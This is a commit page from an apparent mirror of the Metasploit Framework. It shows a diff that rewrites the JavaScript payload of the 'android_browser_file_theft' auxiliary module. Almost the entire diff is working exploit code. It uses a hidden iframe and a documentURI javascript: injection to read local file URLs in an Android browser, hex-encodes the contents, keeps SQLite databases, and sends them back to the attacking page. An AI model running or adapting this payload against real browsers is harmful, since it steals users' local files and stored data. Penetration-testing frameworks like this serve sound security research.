infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Okay, putting source code in a quoted string is horrible.

bug/bundler_fix
joev 2015-03-05 23:25:37 -06:00
parent c4b85603d2
commit 3c5d7b3ef0
1 changed files with 48 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

70
modules/auxiliary/gather/android_browser_file_theft.rb
View File

@ -110,32 +110,66 @@ class Metasploit3 < Msf::Auxiliary
def exploit_js def exploit_js
js_obfuscate %Q| js_obfuscate %Q|
window.onmessage = function(e) { window.onmessage = function(e) {
var x = new XMLHttpRequest; var x = new XMLHttpRequest;
x.open("POST", location.href); x.open("POST", location.href);
x.send(JSON.stringify(e.data)) x.send(JSON.stringify(e.data))
}; };
var brokenFrame = document.createElement('iframe');
brokenFrame.src = 'http://localhost:100'; function xss() {
brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;') var urls = (#{JSON.generate(file_urls)});
brokenFrame.onload = function() { function tick() {
brokenFrame.onload = null; setTimeout(function() { next(urls.shift()); });
document.documentURI = 'javascript://hostname.com/%0D%0Aurls=(#{JSON.generate(file_urls)});'+ };
'var t=function(){setTimeout(function(){next(urls.shift());},1)};window.onmessage=t;'+ window.onmessage = tick;
'var next=(function(url){if(!url)return;try{var f = document.createElement("iframe");f.src=url;f.onload=f'+
'unction(){f.onload=null;document.documentURI="javascript://hostname.com/%250D%250Ax=new '+ function next(url) {
'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.responseType=String.fromCharCode(97,'+ if (!url) return;
'114,114,97,121,98,117,102,102,101,114);x.send();x.onload=function(){window.onerror=alert;'+ try {
'var buff = new Uint8Array(x.response);var hex = Array.prototype.map.call(buff, function(d)'+ var f = document.createElement('iframe');
'{var c = d.toString(16);return (c.length < 2) ? 0+c : c;}).join(new String); top.postMessa'+ f.src = url;
'ge({data:hex,url:location.href}, String.fromCharCode(42));'+ f.onload = function() {
'parent.postMessage(1,String.fromCharCode(42));};x.onerror=function(){parent.postMessage(1,S'+ f.onload = null;
'tring.fromCharCode(42))};";f.contentWindow.location = "";};document.body.appendChild(f);}catch(e){t();}});t();'; function nested() {
brokenFrame.contentWindow.location = ""; var x = new XMLHttpRequest;
x.open('GET', location.href);
x.responseType = 'arraybuffer';
x.send();
x.onload = function() {
var buff = new Uint8Array(x.response);
var hex = Array.prototype.map.call(buff, function(d) {
var c = d.toString(16);
return (c.length < 2) ? 0+c : c;
}).join(new String);
if (hex.length && hex.substring(0,8)==='53514c69') {
top.postMessage({data:hex,url:location.href}, '*');
}
parent.postMessage(1,'*');
};
x.onerror = function() {
parent.postMessage(1,'*');
};
}
document.documentURI = 'javascript://hostname.com/%0D%0A('+encodeURIComponent(nested.toString())+')()';
f.contentWindow.location = "";
};
document.body.appendChild(f);
} catch(e) {t();}
}; };
tick();
}
var brokenFrame = document.createElement('iframe');
brokenFrame.src = 'http://localhost:100';
//brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
brokenFrame.onload = function() {
brokenFrame.onload = null;
document.documentURI = 'javascript://hostname.com/%0D%0A('+encodeURIComponent(xss.toString())+')()';
brokenFrame.contentWindow.location = "";
};
document.body.appendChild(brokenFrame); document.body.appendChild(brokenFrame);
| |
end end